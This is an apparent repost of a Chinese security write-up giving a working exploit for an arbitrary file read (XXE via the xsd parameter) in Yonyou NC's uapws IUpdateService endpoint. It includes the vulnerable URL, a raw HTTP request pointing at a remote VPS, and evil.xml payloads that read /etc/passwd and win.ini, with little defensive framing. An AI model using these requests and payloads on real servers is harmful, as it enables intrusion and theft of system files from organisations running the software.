漏洞存在位置
http://x.x.x.x/uapws/service/nc.uap.oba.update.IUpdateService?wsdl
修改xsd参数值可触发该漏洞,请求远程VPS服务器。
GET /uapws/service/nc.uap.oba.update.IUpdateService?xsd=http://x.x.x.x/test.xml HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Accept: text/plain, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
存在漏洞响应如下
任意文件读取利用,需要VPS上建立对应操作系统的xml文件,然后开启http服务。xml文件如下
windows:
<!ENTITY name SYSTEM "file:///c://windows/win.ini">
]>
<user><username>&name;</username><password>1</password></user>
linux:
evil.xml:
<!ENTITY name SYSTEM "file:///etc/passwd">
]>
<user><username>&name;</username><password>1</password></user>
触发文件读取漏洞响应如下
链接:https://pan.baidu.com/s/1oUd3H7yOdYCXLUCfuzA0DA
提取码:bgl0
原文始发于微信公众号(天澜实验室):用友 NC uapws wsdl 任意文件读取
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论